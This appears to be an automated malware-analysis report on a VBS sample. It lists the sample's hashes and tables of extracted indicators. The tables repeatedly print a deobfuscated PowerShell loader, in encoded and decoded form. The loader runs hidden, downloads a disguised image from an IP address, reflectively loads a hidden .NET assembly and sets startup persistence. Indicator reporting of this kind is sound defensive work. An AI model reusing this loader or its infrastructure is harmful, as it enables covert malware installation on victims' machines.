|
Hash | Hash Value |
|---|---|
| MD5 | 98e3aeec9930f862d54a8dbb61f4b554
|
| Sha1 | 3057ca57a6346a718b51c53259f63d58a274febe
|
| Sha256 | bfaaf672b1741b950b48b3f2296d79bf38c18bc8f14fd1b38905721299811386
|
| Sha384 | 3ef6f600c1dbea4bf933fda92859d678b33ea77ea4561ac0f363ab33b70431f8cf0a4e4a4d419aac4a50356f7299891c
|
| Sha512 | 982363e7cf9369f7286100fa63b6c2fd771ecdfa44755c812cf9e76c9e0505b5276e95b6d97e5d16c3b2d4e8ff91087c375e35a938fa738a8f25660a9386db9f
|
| SSDeep | 384:WLgFhg5nG6FwmXvJlxFxYXN/MEaRvAhpKoi0sVRXCSlah9HsSoSHHVFADn:WMFhg5nZFwmR7efvKRyZHHVmn
|
| TLSH | 27D2D766BE2DD3264814020DFFCB2C16DE6C44904E0591A5FB3CCD9C1E2A42A9FB6E77
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTlTUmpaalcwQjFOMDhDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ0Nhc1BvbCcsJycsJ0Nhc1BvbCcsJzAnLCdodHRwczovL3Bhc3RlZnkuYXBwL3E0aWNvcHV0L3JhdycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywndmJzJywnMScsJzAnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTlTUmpaalcwQjFOMDhDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ0Nhc1BvbCcsJycsJ0Nhc1BvbCcsJzAnLCdodHRwczovL3Bhc3RlZnkuYXBwL3E0aWNvcHV0L3JhdycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywndmJzJywnMScsJzAnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
98e3aeec9930f862d54a8dbb61f4b554 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTlTUmpaalcwQjFOMDhDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ0Nhc1BvbCcsJycsJ0Nhc1BvbCcsJzAnLCdodHRwczovL3Bhc3RlZnkuYXBwL3E0aWNvcHV0L3JhdycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywndmJzJywnMScsJzAnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTlTUmpaalcwQjFOMDhDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ0Nhc1BvbCcsJycsJ0Nhc1BvbCcsJzAnLCdodHRwczovL3Bhc3RlZnkuYXBwL3E0aWNvcHV0L3JhdycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywndmJzJywnMScsJzAnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious |
98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |